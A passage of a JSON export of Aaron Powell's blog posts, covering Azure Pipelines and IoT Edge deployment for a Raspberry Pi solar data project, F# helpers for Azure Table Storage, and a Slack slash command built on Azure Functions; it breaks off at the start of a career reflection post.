"serviceBusTopics": [], "eventHubs": [{ "connectionString": "[listKeys(resourceId('Microsoft.EventHub/namespaces/eventhubs/authorizationRules', variables('EventHubsName'), 'live-list', variables('IotHubName')), '2017-04-01').primaryConnectionString]", "name": "sunshine-live-list-eh", "subscriptionId": "[subscription().subscriptionId]", "resourceGroup": "[resourceGroup().name]" }, ... ], "storageContainers": [] }, "routes": [{ "name": "live-list", "source": "DeviceMessages", "condition": "__messageType='liveList'", "endpointNames": [ "sunshine-live-list-eh" ], "isEnabled": true }, ... We can even build up the connection string to Event Hub authorization rules using the listKeys function combined with resourceId. 
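That listKeys/resourceId expression is fairly dense, so here it is again spread over multiple lines purely to show how the pieces nest (in the actual template it has to stay on one line inside the JSON string): resourceId identifies the authorization rule on the live-list Event Hub, and listKeys then pulls that rule’s primaryConnectionString.

[listKeys(
    resourceId(
        'Microsoft.EventHub/namespaces/eventhubs/authorizationRules',
        variables('EventHubsName'),
        'live-list',
        variables('IotHubName')),
    '2017-04-01').primaryConnectionString]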
A note with using resourceId, when you’re joining the segments together you don’t need the / separator except for the resource type, which is a bit confusing when you create a resource name like "name": "[concat(variables('EventHubsName'), '/live-list/', variables('IotHubName'))]", which does contain the /.\nA new Job is created for this template:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 - job: PrepareAzureIoTEnvrionment displayName: Prepare Azure IoT Environment pool: vmImage: "Ubuntu-16.04" variables: resourceGroupName: sunshine-prod steps: - task: AzureResourceGroupDeployment@2 displayName: "Azure Deployment:Create Or Update Resource Group action on sunshine-prod" inputs: azureSubscription: "$(azureSubscription)" resourceGroupName: "$(azureResourceNamePrefix)-prod" location: "$(azureResourceLocation)" templateLocation: Linked artifact csmFile: "$(System.DefaultWorkingDirectory)/.build/azure-environment.json" overrideParameters: '-name $(azureResourceNamePrefix) -location "$(azureResourceLocation)"' deploymentOutputs: ResourceGroupDeploymentOutputs And now you might be wondering “Why is the step to create the production environment in Azure done in a Build phase, not Release phase?”, which is a pretty valid question to ask, after all, if I did have multiple environments, why wouldn’t I do the Azure setup as part of the release to that environment?\nWell, the primary reason I took this approach is that I wanted to avoid having to push the Resource Manager template from the Build to Release phase. Since the Build phase does the git clone and the Release phase does not I would have had to attach the template as an artifact. Additionally, I want to use some of the variables in both phases, but you can’t share variables between Build and Release, which does still pose a problem with the environment setup, I need the name of the Azure Functions and IoT Hub resources.\nTo get those I write the output of the Resource Manager deployment to a file that is attached as an artifact:\n1 2 3 4 5 6 7 8 9 10 11 - task: PowerShell@2 displayName: Publish ARM outputs for asset inputs: targetType: filePath filePath: "$(Build.SourcesDirectory)/.build/Set-ReleaseResourceManagerOutput.ps1" arguments: -ResourceManagerOutput '$(ResourceGroupDeploymentOutputs)' - task: PublishBuildArtifacts@1 displayName: "Publish Artifact" continueOnError: true inputs: artifactName: arm Using this PowerShell script:\n1 2 3 4 5 6 7 param ( [Parameter(Mandatory=$true)] [string] $ResourceManagerOutput ) Set-Content -Path $env:BUILD_ARTIFACTSTAGINGDIRECTORY/release-output.json -Value $ResourceManagerOutput 🎉 Build phase completed! You can find the complete Azure Pipeline YAML file in GitHub.\nDeploying Releases Here’s the design of our Release process that we’re going to go ahead and create using the Azure Pipelines UI:\nOn the left is the artifacts that will be available to the Release, it’s linked to the Build pipeline we just created and it’s set to automatically run when a build completes successfully.\nI’ve defined three Stages, which represent groups of tasks I will run. 
I like to think of Stages like environments, so I have an environment for my Raspberry Pi and an environment for my Azure Functions (I do have a 2nd Raspberry Pi environment, but that’s my test device that lives in the office, and I just use to smoke test IoT Edge, generally it’s not even turned on).\nPi Stage Let’s have a look at the stage for deploying to a Raspberry Pi, or really, any IoT device supported by IoT Edge:\nThe first task is to get our deployment template. Because I’m using an Azure storage account to store this I use the Azure CLI to download the file, but if you’re using it as an artifact from the build output, you’d probably skip that step (since artifacts are automatically downloaded).\nWith the deployment downloaded it’s time to talk to Azure IoT Hub!\nProvisioning the Device Continuing on our approach to assume nothing exists we’ll run a task that checks for the device identity in IoT Hub and if it doesn’t exist, create it.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 #! /bin/sh IoTHubName=$(cat $SYSTEM_DEFAULTWORKINGDIRECTORY/_aaronpowell.sunshine/arm/release-output.json | jq '.iotHubName.value' | sed s/\\"// | sed s/\\"//) # install iot hub extension az extension add --name azure-cli-iot-ext # check if device exists # note: redirect to /dev/null so the keys aren't printed to logs, and we don't need the output anyway az iot hub device-identity show \\ --device-id $DEVICE_ID \\ --hub-name $IoTHubName >> /dev/null if [ $? -ne 0 ]; then az iot hub device-identity create --hub-name $IoTHubName --device-id $DEVICE_ID --edge-enabled TMP_OUTPUT="$(az iot hub device-identity show-connection-string --device-id $DEVICE_ID --hub-name $IoTHubName)" RE="\\"cs\\":\\s?\\"(.*)\\"" if [[ $TMP_OUTPUT =~ $RE ]]; then CS_OUTPUT=${BASH_REMATCH[1]}; fi echo "##vso[task.setvariable variable=CS_OUTPUT]${CS_OUTPUT}" fi It’s a little bit hacked my shell script skills are not that great! 🤣\nWe’ll need the name of the IoT Hub that was created using Resource Manager in the build phase, which we can pull using jq. After that install the IoT Hub CLI extension, since the commands we’ll need don’t ship in the box.\nThe command that’s of interest to us is az iot hub device-identity show which will get the device identity information or return a non-zero exit code if the device doesn’t exist. Since the default of the command is to write to standard out and the output contains the device keys, we’ll redirect that to /dev/null as I don’t actually need the output, I just need the exit code. If you do need the output then I’d assign it to a variable instead.\nIf the device doesn’t exist (non-zero exit code, tested with if [ $? -ne 0 ]) you can use az iot hub device-identity create. Be sure to pass --edge-enabled so that the device can be connected with IoT Edge!\nThe last thing the script will do is export the connection string if the connection string can be retrieved (not 100% sure on the need for this, it was just in the template!).\nPreparing the Module Twin In my post about the data downloader I mentioned that I would use module twins to get the credentials for my solar inverter API, rather than embedding them.\nTo get those into the module twin we’ll use the Azure CLI again:\n1 2 3 4 5 6 7 8 9 10 11 #! 
/bin/sh az extension add --name azure-cli-iot-ext IoTHubName=$(cat $SYSTEM_DEFAULTWORKINGDIRECTORY/_aaronpowell.sunshine/arm/release-output.json | jq '.iotHubName.value' | sed s/\\"//g) az iot hub module-twin update \\ --device-id $DEVICE_ID \\ --hub-name $IoTHubName \\ --module-id SunshineDownloader \\ --set properties.desired="{ \\"inverter\\": { \\"username\\": \\"$SUNSHINEUSER\\", \\"password\\": \\"$SUNSHINEPWD\\", \\"url\\": \\"$SUNSHINEURL\\" } }" >> /dev/null Using the az iot hub module-twin update command we can set the properties.desired section of the twin (this just happens to be where I put them, but you can create your own nodes in the twin properties). Like the last task, the output is redirected to /dev/null so that the updated twin definition, which is returned, doesn’t get written to our log file. After all, our secrets wouldn’t be secret if they were dumped to the logs!\nIt’s Time to Deploy Finally it’s time to send our deployment to IoT Edge! We’ll use the IoT Edge task again, but this time the action will be Deploy to IoT Edge devices:\nWe specify the deployment template that we’ll execute (the one we got from storage) and it’s going to be a Single Device deployment (if you were deploying to a fleet of devices then you’d change that and specify some way to find the group of devices to target). Under the hood, this task will execute the iotedgedev tool with the right commands and will result in our deployment going to IoT Edge and eventually our device! 🎉\nDeploying Functions With our stage defined for IoT devices it’s time for the Azure Functions. As it turns out, Azure Pipelines is really good at doing this kind of deployment; there’s a task that we can use and all we need to do is provide it with the ZIP that contains the functions (which comes from our artifacts).\nThere’s no need to provide the connection strings, as that was set up in the Resource Manager template!\n🎉 Release phase complete!\nConclusion Phew, that was a long post, but we’ve covered a lot! Our deployment has run end-to-end, from a git push that triggers the build to creating an Azure environment, compiling our application to building Docker images, setting up devices in IoT Hub and eventually deploying to them.\nI’ve made the Azure Pipeline I use public so you can have a look at what it does, you’ll find the Build phase here and the Release phase here.\nAs I said at the start, I’d encourage you to have a read of the information on Microsoft Docs to get an overview of what the process would be and then use this article as a way to supplement how everything works.\nHappy DevOps’ing!\n", "id": "2019-07-22-home-grown-iot-automated-devops" }, { "title": "Home Grown IoT - Simple DevOps", "url": "https://www.aaron-powell.com/posts/2019-07-16-home-grown-iot-devops/", "date": "Tue, 16 Jul 2019 11:15:32 +1000", "tags": [ "fsharp", "iot", "devops" ], "description": "It's time to rub some DevOps on IoT", "content": "The app is built and our data can be processed; all that is left is to get everything deployed, and guess what the topic of this post will be!\nWhen it comes to CI/CD (Continuous Integration/Continuous Deployment) for IoT projects it can feel a bit daunting, you’ve got this tiny little computer that you’re trying to get stuff onto, it’s not just “the cloud” that you’re targeting. And these devices are not like normal computers, they have weird chipsets like ARM32!\nDeploying to a Raspberry Pi We need to work out how to get our downloader onto the Raspberry Pi.
As I mentioned in the post on how the downloader works, I do the local development using Docker and ideally I want to run Docker on the Pi. Running Docker on a Pi is straightforward, you just install it from the Linux package manager like any other piece of software; the only difference is that your base image will need to be an ARM32 image, and thankfully Microsoft ships this for us (for reference I use mcr.microsoft.com/dotnet/core/runtime:2.2.5-stretch-slim-arm32v7 as my base image).\nGetting Containers onto the Pi I’ve got my Dockerfile, I can make an Image but how do I get that onto the Pi and then run a Container?\nDevOps! 🎉\nMy initial idea was to deploy an Azure Pipeline agent onto the Raspberry Pi and then add that to my agent pool in Azure Pipelines. I know this is possible, I’ve seen Damian Brady do it, but it turns out that he was using a custom compiled agent and it’s not really supported. So that’s not really ideal, I don’t want a solution that I have to constantly ensure is working, I just want something that works.\nAnd this is what led me to Azure IoT Edge.\nIntroducing IoT Edge IoT Edge is part of the Azure IoT suite and it’s designed for deploying reusable modules onto IoT devices, also known as “Edge Devices”.\nThe way IoT Edge works is you run an agent on the device that communicates with IoT Hub. In IoT Hub you create a deployment against a device in which you specify the modules, which are Docker images, that you want to run on the device. IoT Edge checks for deployments; when it finds one it pulls it down, grabs the Docker images and runs the containers. Here is a really good starting point to understand IoT Edge’s architecture and how it fits into a solution. I’m not going to cover all of that in detail, instead I’m going to focus on the pieces that you need to understand when it comes to using IoT Edge for deployments.\nGetting the Solution Ready for DevOps If you’re like me and started building a project before learning about all the things you’d need to use you may need to retrofit IoT Edge into it. The IoT Edge docs have a good getting started guide that I’d encourage you to read if you’re just getting started, but since I didn’t know about IoT Edge until I had already built it, let’s look at what’s needed to IoT Edge-ify a project.\nDocker Images The really nice thing about how IoT Edge works is that it uses Docker as the delivery mechanism for the applications you want to run on the device; the only stipulation is that the Image uses a base of ARM32 (or ARM64 if that’s what your device runs). So this means that we’ll need to create an additional Dockerfile that will be able to run on our Raspberry Pi.\nFROM mcr.microsoft.com/dotnet/core/runtime:2.2.5-stretch-slim-arm32v7 WORKDIR /app COPY ./bin/Release/netcoreapp2.2/publish ./ ENTRYPOINT ["dotnet", "Sunshine.Downloader.dll"] Source on GitHub\nOh, that’s not really that different to how we do local dev; in fact it’s actually a really basic Dockerfile, all it does is copy the build artifacts in (we’re not using multi-stage Dockerfiles as I discussed in the local dev post).\nIoT Edge Modules Before we talk about how to do a deployment with IoT Edge I want to talk about IoT Edge Modules. A Module is an application that is running on your device and is defined in a JSON file.
A device may have multiple Modules deployed onto it, but a Module is a single application.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 { "$schema-version": "0.0.1", "description": "", "image": { "repository": "${CONTAINER_REGISTRY_SERVER}/sunshine-downloader", "tag": { "version": "${BUILD_BUILDID}", "platforms": { "amd64": "./Dockerfile.amd64", "amd64.debug": "./Dockerfile.amd64.debug", "arm32v7": "./Dockerfile.arm32v7" } }, "buildOptions": [], "contextPath": "./" }, "language": "csharp" } Source on GitHub\nHere’s the JSON for my Sunshine Downloader Module. There’s a bit of metadata in there (description, language) with the important part of it being the image. In here we define how we’re going to build our Image and what container registry is it going to be published to.\nFirst off, the registry. This can be published to a private registry, such as your own Azure Container Registry (this is what I use) or to a public registry like Docker Hub (although I wouldn’t advise that). You’ll need to make sure that the registry can be accessed by the device you’re deploying to, so they need to be on the same local network, vpn or it needs to be internet addressable.\nNext, you define the tag for the Image, and the Dockerfiles that will be used to create them. I’m generating 3 Images, two AMD64 images (one which contains the debugging symbols) and my ARM32 image. It’s generally good practice to name the tags relative to the architecture they represent, but it’s not mandatory. We will need the names soon, so make sure they aren’t too obscure.\nFinally, we can give some arguments to the docker build command that will ultimately be executed here in the buildOptions.\nSomething you might’ve noticed in the JSON above is that I have a few ${...} things. These are references to environment variables that will be available when I’m creating the deployment. The CONTAINER_REGISTRY_SERVER will need to be the URL of the registry you’re using and I’m passing BUILD_BUILDID from the Azure Pipeline Build Variables, but that can be anything you want to tag the version.\nOne thing I did find that was important with Modules is that you need to name the file module.json and have it sitting alongside the Dockerfiles that you are using. Because of this I ended up placing all the files in the same folder as the source code for the downloader.\nDeployments with IoT Edge With our Module defined we can go ahead and create a deployment with IoT Edge. 
For this we’ll need to create a deployment.template.json file, which is our deployment template that will be used to create the deployment for our different module platforms.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 { "$schema-template": "1.0.0", "modulesContent": { "$edgeAgent": { "properties.desired": { "schemaVersion": "1.0", "runtime": { "type": "docker", "settings": { "minDockerVersion": "v1.25", "loggingOptions": "", "registryCredentials": { "YourACR": { "username": "${CONTAINER_REGISTRY_USERNAME}", "password": "${CONTAINER_REGISTRY_PASSWORD}", "address": "${CONTAINER_REGISTRY_SERVER}" } } } }, "systemModules": { "edgeAgent": { "type": "docker", "settings": { "image": "mcr.microsoft.com/azureiotedge-agent:1.0.7", "createOptions": "" } }, "edgeHub": { "type": "docker", "status": "running", "restartPolicy": "always", "settings": { "image": "mcr.microsoft.com/azureiotedge-hub:1.0.7", "createOptions": { "HostConfig": { "PortBindings": { "5671/tcp": [{ "HostPort": "5671" }], "8883/tcp ": [{ "HostPort": "8883" }], "443/tcp": [{ "HostPort": "443" }] } } } } } }, "modules": { "SunshineDownloader": { "version": "1.0", "type": "docker", "status": "running", "restartPolicy": "always", "settings": { "image": "${MODULES.Sunshine.Downloader}", "createOptions": {} } } } } }, "$edgeHub": { "properties.desired": { "schemaVersion": "1.0", "routes": { "route": "FROM /* INTO $upstream" }, "storeAndForwardConfiguration": { "timeToLiveSecs": 7200 } } } } } Source on GitHub\nThis file is a bit large so it’s time to break it down and learn what we need to know about it.\nIt starts off defining some information about the agent that’s running on our device in the $edgeAgent node. You’ll notice in there are the credentials for your container registry (ACR or other), like the module.json file, these come from environment variables that you would set before generating the deployment from the template.\nNext up we define the systemModules which tells the deployed Edge agent about the Edge agent to run, really what this means is that we can configure the agent and upgrade it just by creating a deployment. The agent is a Docker image (found here) as is the Edge Hub (found here). I’m using release 1.0.7 which was the stable at the time I build Sunshine, but there may be a newer version that you can grab. Both of these pieces are important as the Agent is the container that talks to IoT Hub, reports statuses, etc. whereas the Hub is the bridge between your application and IoT Hub.\nWithin the modules node you define the modules that you wish to install into your device. This is a JSON object where you can define as many as you want, and the name that you give it is the name that will appear if you do a docker ps on your device (I’ve used SunshineDownloader) so it’ll need to conform to Docker container naming conventions. The two important parts of the module definition that you’ll need to set are the Image variable and any createOptions that your Container will need.\nFor the image property I have ${MODULES.Sunshine.Downloader}, but what does that represent and how does it even work? This variable is made up for two parts, the first, MODULES is the MODULES_PATH that the IoT Edge tooling looks for. 
By default it will look for a folder called modules relative to the directory that the template is in (source reference) but can be overridden using a .env file. In fact, this is what I do since my source code is in the src folder. The rest of the variable is the folder within the MODULES_PATH that your module resides in, leading up to module.json.\nThe final node within our JSON is $edgeHub which is some instructions for the IoT Hub module that allows us to control information about it. I’m using this to ensure that messages from my module land in IoT Hub using the route. Defining a route of FROM /* INTO $upstream basically says “every message from the device goes into the primary IoT Hub endpoint”. This can be used to configure pre-routing of the messages, but I route messages within IoT Hub instead.\nRunning a Deployment Our deployment template is created, our module is defined and our images are ready to be built, all that is left is to, well, deploy!\nTo do a deployment we will use the IoT Edge Dev Tool, an Open Source Python application for working with IoT Edge.\nCreating an Image Because my deployment.template.json file lives in the .build folder (I like to keep my files for different tasks out of the repository root) we’ll navigate there. Now we can run iotedgedev build and it’ll build the Image for us. By default it’ll use the amd64 architecture and “push” to your local Docker registry, but we want to deploy to our Pi so we’ll need to edit the .env and set the IOTHUB_CONNECTION_STRING and DEVICE_CONNECTION_STRING entries to the appropriate pieces from Azure (note: I didn’t check those into source control!) and you’ll need to pass the --platform argument with arm32v7 to build that module image.\nOnce the build has completed you’ll find a new deployment file named deployment.<platform>.json (so deployment.arm32v7.json) which is what we’ll use for the deployment to the device.\nPublishing an Image With our Image built we can push it to our container registry, again to support that you need to set the CONTAINER_REGISTRY_USERNAME, CONTAINER_REGISTRY_PASSWORD and CONTAINER_REGISTRY_SERVER environment variables to ACR (or any other container registry you want to push to) prior to doing a build, as they are added to the deployment.<platform>.json file. Then execute the iotedgedev push command to push your image to the registry. This command will want to do a build, so pass --no-build if you want to skip Image creation.\nDeploying an Image For us to deploy the image we won’t use the iotedgedev tool, instead we’ll use the Azure CLI and specifically the IoT Extensions, so grab the Azure CLI (I use the Docker distribution of it), log in to your account and install the IoT Extension.\nWe’re going to use the edge deployment create command to create a deployment in IoT Hub for our IoT Edge device using the deployment template we specified above.\n1 $> az iot edge deployment create --deployment-id deployment-01 --hub-name <iot hub name in Azure> --content <path to deployment JSON file> --target-condition deviceId='<name of IoT device in Azure>' --priority 0 Assuming everything went successfully you will now see a deployment listed in Azure against your IoT Edge device and shortly the device will pull the Image and start a Container from it!\nConclusion Phew, that was a bit of a complex blog as there’s a lot of little pieces that come into play when you start looking to deploy to an IoT device. 
Admittedly, I made things a bit harder on myself because I went down the route of creating the application before deciding to use IoT Edge for deployments. If I was to start again I would stick more with the guidance outlines on the docs site, there’s quite a good step-by-step guide starting here that goes through the process.\nWe start with defining our Module, which is the thing that we’ll run on the IoT device as a Docker Container, next we create a deployment.template.json file which is a generic template that describes how to deploy to a platform and finally we can use the Azure CLI to create a deployment for our device to pick up.\nNext time we’ll move away from executing the commands ourselves and control it all via Azure Pipelines.\n", "id": "2019-07-16-home-grown-iot-devops" }, { "title": "Using FSharp with Table Storage and Azure Functions", "url": "https://www.aaron-powell.com/posts/2019-07-12-using-fsharp-with-table-storage-and-azure-functions/", "date": "Fri, 12 Jul 2019 15:02:01 +1000", "tags": [ "fsharp", "azure-functions", "serverless" ], "description": "A quick look at how to use the FSharp.Azure.Storage package in Azure Functions", "content": "I’ve been doing a lot of work recently with Azure Functions in which I use Table Storage as the backend for it. This led me to start using the FSharp.Azure.Storage NuGet package which gives a nicer API for Table Storage (and also happens to be written by a former colleague of mine).\nBut there’s a catch, FSharp.Azure.Storage is designed to work with the CloudTableClient which you would normally get like so:\n1 2 3 4 5 6 7 open Microsoft.WindowsAzure.Storage open Microsoft.WindowsAzure.Storage.Table let account = CloudStorageAccount.Parse "UseDevelopmentStorage=true;" //Or your connection string here let tableClient = account.CreateCloudTableClient() let inGameTable game = inTable tableClient "Games" game But when we’re using an Azure Function we’re likely doing a binding in our Function parameter, like this:\n1 2 3 4 [<FunctionName("Some_Function")>] let someFunction ([<HttpTrigger(AuthorizationLevel.Function, "get", Route = "some-function")>] req: HttpRequest) ([<Table("MyData")>] dataTable: CloudTable) = // do stuff Notice that here we’ll receive a CloudTable, which has already been created from the CloudTableClient. This is because Azure Functions takes care of the creation and “connection pooling” (for lack of a better description) so that we don’t need to do it ourselves as the Functions scale. We also need the name of the table that we’re working with, again we don’t need to worry about that in our Function, since we already have the CloudTable.\nThankfully, we can go from a CloudTable back to the CloudTableClient and get the name of the table at the same time. 
To do this I’ve created some new functions in my F# codebase:\n1 2 3 4 5 6 7 8 9 10 11 12 module azureTableUtils open FSharp.Azure.Storage.Table open Microsoft.WindowsAzure.Storage.Table let fromTableToClientAsync (table: CloudTable) q = fromTableAsync table.ServiceClient table.Name q let fromTableToClient (table: CloudTable) q = fromTable table.ServiceClient table.Name q let inTableToClientAsync (table: CloudTable) o = inTableAsync table.ServiceClient table.Name o let inTableToClient (table: CloudTable) o = inTable table.ServiceClient table.Name o let inTableToClientAsBatch (table: CloudTable) o = inTableAsBatch table.ServiceClient table.Name o let inTableToClientAsBatchAsync (table: CloudTable) o = inTableAsBatchAsync table.ServiceClient table.Name o From the CloudTable you can access the ServiceClient to get the CloudTableClient and Name gives you the name!\nNow we can use it in our Azure Function like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 [<FunctionName("Some_Function")>] let someFunction ([<HttpTrigger(AuthorizationLevel.Function, "get", Route = "some-function")>] req: HttpRequest) ([<Table("MyData")>] dataTable: CloudTable) = async { let! data = Query.all<MyData> |> fromTableToClientAsync dataTable let! data |> Seq.map (fun (d, _) -> { d with Value = "Updated" }) |> Replace |> autobatch |> List.map (inTableToClientBatch dataTable) |> Async.Parallel return OkResult() :> IActionResult } |> Async.StartAsTask Feel free to use those functions in your own applications. You will have to explcitly type the table argument as CloudTable as the F# type inference isn’t able to pick up that that’s what it is otherwise.\nHappy F#‘ing!\n", "id": "2019-07-12-using-fsharp-with-table-storage-and-azure-functions" }, { "title": "Creating Slack Commands With Azure Functions", "url": "https://www.aaron-powell.com/posts/2019-07-12-creating-slack-commands-with-azure-functions/", "date": "Fri, 12 Jul 2019 09:44:37 +1000", "tags": [ "fsharp", "azure-functions", "serverless" ], "description": "A guide to creating a Slack 'slash command' using Azure Functions as the handler.", "content": "I’ve recently been doing some upgrades to the infrastructure of DDD Sydney, primarily around migrating the API from the Azure Functions v1 stack to v2 (it’s actually picking up a change from last year that I put on hold due to a bug in the v2 preview).\nOnce I got the core functionality completed I decided it was time to tackle something that I’d always wanted, a way that we could view the session information and perform some tasks in our Slack channel.\nExtending Slack There are a few different ways that you can extend Slack, and since my needs are simple I decided to use the Slash Command so that we can type /sessions 2019 and get a list of all the sessions that are submitted for a particular year.\nThe first step is to create a new application in Slack against the workspace you want:\nOur app is ready for us to start creating commands for, but before we create the command we’re going to need a URL for it to call when invoked, and for that we’ll use Azure Functions.\nCreating our Function I use VS Code to create the Function (but choose whichever editor you want) and I then modified the generated project so I can use F# (see this post for what you need to do).\nWith that all done it’s time to create a Function, let’s create the Function that lists the approved sessions! 
Quick note: we sync the sessions from Sessionize but mark them as “unapproved”, meaning that we do a quick review of them to ensure they don’t violate our Code of Conduct, before approving them. Only approved sessions can be voted on.\nWhen a slash command is executed it sends a HTTP POST to the endpoint you provide, so we’ll need to use the HTTP binding.\nmodule SlackCommands open Microsoft.Azure.WebJobs open Microsoft.Azure.WebJobs.Extensions.Http open Microsoft.AspNetCore.Http [<FunctionName("Slack_Approved_Sessions")>] let approvedSessionsCommand ([<HttpTrigger(AuthorizationLevel.Function, "post", Route = "v2/Slack-ApprovedSession")>] req: HttpRequest) ([<Table("Session", Connection = "EventStorage")>] sessionsTable) ([<Table("Presenter", Connection = "EventStorage")>] presentersTable) = ignore() Let’s break it down: we start off creating the F# function that will be our Azure Function, named approvedSessionsCommand. It’s decorated with the FunctionName attribute so that the Functions Host knows about it. Finally, we provide it with some arguments with bindings; for this one we’ll need three bindings, the first is the HttpTrigger attribute and then the two Table bindings for us to access Table Storage where the data is kept. For the HttpTrigger its access level is defined as AuthorizationLevel.Function, meaning that a key needs to be provided to access it (basic security), it’s listening for “post” requests only and the route is v2/Slack-ApprovedSession (v2 because this is the second generation of the API for DDD Sydney).\nHandling the Incoming Message When a slash command is typed you can provide a message to it and this message is passed to the Function being called. I want to use this to get the year out, so the command can be used every year without change, invoking it like /sessions 2019.\nTo get this text we need to grab it out of the incoming message body; unfortunately, this isn’t a JSON payload, it’s a standard form post, so no nice clean object for us. 🙁\nInstead we’ll need to get it out of the body of the HttpRequest:\n[<FunctionName("Slack_Approved_Sessions")>] let approvedSessionsCommand ([<HttpTrigger(AuthorizationLevel.Function, "post", Route = "v2/Slack-ApprovedSession")>] req: HttpRequest) ([<Table("Session", Connection = "EventStorage")>] sessionsTable) ([<Table("Presenter", Connection = "EventStorage")>] presentersTable) = let year = req.Form.["text"].[0] ignore() The text property of the form contains what was entered by the user (minus the slash command) so it’s a good idea to do some validation against it to make sure it conforms to the structure you want and reject it if it doesn’t.\nGetting Data I’ll only quickly go over how this particular function gets the data as it’s specific to my scenario and yours may be different. What’s important to note is that this is just an Azure Function so you can do whatever you need to do.\nThe data for our sessions is stored in Table Storage across two tables, the Session table, which contains the session metadata, and the Presenter table, which contains the presenters for the session since a session may have multiple presenters (also we don’t de-dup the presenter table so if you submit multiple talks we have multiple records for you).
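To make the queries that follow easier to read, here is a rough sketch of what those two entity types might look like, based only on the properties used in this post; the real types in the DDD Sydney codebase carry more fields, plus the partition and row key metadata the storage library needs.

// Sketch only: field names inferred from the queries below, all assumed to be strings
type SessionV2 =
    { SessionizeId: string
      Title: string
      EventYear: string
      Status: string }

type Presenter =
    { TalkId: string
      FullName: string
      EventYear: string }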
These two tables are “linked” using the ID of the session.\nFor accessing data I use the FSharp.Azure.Storage NuGet package, which gives a nicer F# API for working with Table Storage.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 [<FunctionName("Slack_Approved_Sessions")>] let approvedSessionsCommand ([<HttpTrigger(AuthorizationLevel.Function, "post", Route = "v2/Slack-ApprovedSession")>] req: HttpRequest) ([<Table("Session", Connection = "EventStorage")>] sessionsTable) ([<Table("Presenter", Connection = "EventStorage")>] presentersTable) = async { let year = req.Form.["text"].[0] let! sessions = Query.all<SessionV2> |> Query.where <@ fun s _ -> s.EventYear = year && s.Status = "Approved" @> |> fromTableToClientAsync sessionsTable let! presenters = Query.all<Presenter> |> Query.where<@ fun p _ -> p.EventYear = year @> |> fromTableToClientAsync presentersTable return ignore() } |> Async.StartAsTask We use Query.all<T> to get the data back and then Query.where to filter on the year provided and (in the case of Sessions) the status of Approved. It’s not super optimised since we get back all presenters, even if they aren’t related to an approved session, but we’re talking ~100 records so the performance isn’t really a worry.\nPreparing Our Response With our data in hand it’s time to send a response back to Slack. Slack supports a lot of ways to create messages but when you are using Layout Blocks you’re limited to 50 blocks, and we’ll have more talks than that so it’s not ideal.\nInstead, we’ll keep it simple and just use a plain text response with embedded mrkdwn. Note: Slack doesn’t use Markdown, it uses its own variant called mrkdwn. There are some subtle differences and limitations on what formatting you can apply.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 let sessionToViewMessage session presenters = presenters |> Seq.map (fun p -> p.FullName) |> String.concat ", " |> sprintf "(%s) _%s_ by *%s*" session.SessionizeId session.Title [<FunctionName("Slack_Approved_Sessions")>] let approvedSessionsCommand ([<HttpTrigger(AuthorizationLevel.Function, "post", Route = "v2/Slack-ApprovedSession")>] req: HttpRequest) ([<Table("Session", Connection = "EventStorage")>] sessionsTable) ([<Table("Presenter", Connection = "EventStorage")>] presentersTable) = async { let year = req.Form.["text"].[0] let! sessions = Query.all<SessionV2> |> Query.where <@ fun s _ -> s.EventYear = year && s.Status = "Approved" @> |> fromTableToClientAsync sessionsTable let! presenters = Query.all<Presenter> |> Query.where<@ fun p _ -> p.EventYear = year @> |> fromTableToClientAsync presentersTable let resultSessions = sessions |> Seq.map(fun (s, _) -> presenters |> Seq.filter (fun (p, _) -> p.TalkId = s.SessionizeId) |> Seq.map (fun (p, _) -> p) |> sessionToViewMessage s) match Seq.length resultSessions with | 0 -> return OkObjectResult(":boom: There are no approved sessions") :> IActionResult | _ -> return OkObjectResult(resultSessions |> String.concat "\\r\\n") :> IActionResult } |> Async.StartAsTask I’ve introduced a function call sessionToViewMessage which takes a session and its presenters and generates a line string like this:\n(12345) _My Awesome Session_ by *Aaron Powell* The result of this is an seq<string> which is concatted together with \\r\\n for a new line and returned as an OkObjectResult, to represent a HTTP 200 OK response to Slack.\nNow that your Function is complete, deploy it to Azure (use a Pipeline, use the VS Code Tooling, etc.) 
and we’re ready to plug it into Slack.\nWiring Up Our Slash Command With our Function deployed it’s time to plug it into our slash command. Before getting started, ensure you have the URL of your Azure Function (you can get it via the portal) as we’ll need it to set up the slash command.\nNow that you have your URL head over to Slack App we created earlier and navigate to Features -> Slash Commands -> Create New Command and fill out the form.\nWhen it’s done hit Save.\nFinally, navigate back to Basic Information and ensure that your application has been installed into your workspace:\nNow your slash command will appear for everyone to use!\n🎉 You now have a slash command powered by Azure Functions!\nConclusion Slash Commands in Slack is a really easy way for you to integrate some custom functionality in your business into your standard tooling. For us at DDD Sydney it means that we can quickly do the admin tasks that we need to do for the conference without having to dig into the Azure portal.\nAnd Azure Functions made this really straight forward, from a simple HTTP Trigger binding to accept the incoming POST, to the pre-parsed form body as a key/value pair and having Functions provide auto-wiring of the other Azure services we need to integrate with. You can check out all the slash command we have in the API on our GitHub API project.\nHopefully this has given you some insights into how to do your own ChatOps with Slack and Azure Functions.\n", "id": "2019-07-12-creating-slack-commands-with-azure-functions" }, { "title": "6 Months at Microsoft", "url": "https://www.aaron-powell.com/posts/2019-07-08-6-months-at-microsoft/", "date": "Mon, 08 Jul 2019 14:21:49 +1000", "tags": [ "career", "microsoft" ], "description": "Has it already been 6 months? Or has it only been 6 months?", "content": "I started off 2019 with my 2018 summary where I announced that I had left Readify and joined Microsoft.\nWell, today is 6 months since I started and I wanted to take some time to reflect on my first 6 months at Microsoft and the first 6 months in a Developer Relations role, aka DevRel.\nSo, like, what do you do for a job? This is probably the most common question I get asked, well, I’ve always been asked it just now it’s been a bit harder to define. It’s especially tricky when talking to someone outside of the tech industry because “DevRel” doesn’t make sense to people who aren’t in tech and even then it’s no guarantee! 🤣\n6 months ago I really didn’t have a clue what my job would entail and part of that is because everyone’s approach to the job is different, some people travel the world presenting at conferences, some people live stream on twitch, some people do podcasts, some people write. So, what do I do?\nI produce 